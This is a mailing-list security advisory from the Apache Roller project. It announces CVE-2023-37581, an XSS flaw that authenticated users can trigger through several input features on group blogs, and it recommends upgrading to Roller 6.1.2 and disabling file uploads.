You are viewing a plain text version of this content. The canonical link for it is here.

Posted to user@roller.apache.org by Dave <sn...@gmail.com> on 2023/08/05 20:12:10 UTC

CVE-2023-37581: Apache Roller: XSS vulnerability for site with untrusted users

The Apache Roller project would like to announce a vulnerability that may
impact Roller installations that allow group blogging with untrusted users.

Severity:

Medium (only impacts group blogging sites with untrusted users)

Description:

Insufficient input validation and sanitation in Weblog Category name,
Website About and File Upload features in all versions of Apache Roller on
all platforms allows an authenticated user to perform an XSS attack.

Mitigation:

If you are not running a group blog, then no mitigation is needed. If you
are running a group blog and you do not have Roller configured for
untrusted users, then you need to do nothing because you trust your users
to author raw HTML and other web content.

But, if you are running a group blog and you do not trust your users to
author HTML, CSS and JavaScript then you should upgrade to Roller 6.1.2 and
you should disable Roller's File Upload feature. Roller 6.1.2 is available
for download here: https://roller.apache.org/downloads/downloads.html

Apache Roller would like to thank Srivani Reddy for reporting this
vulnerability.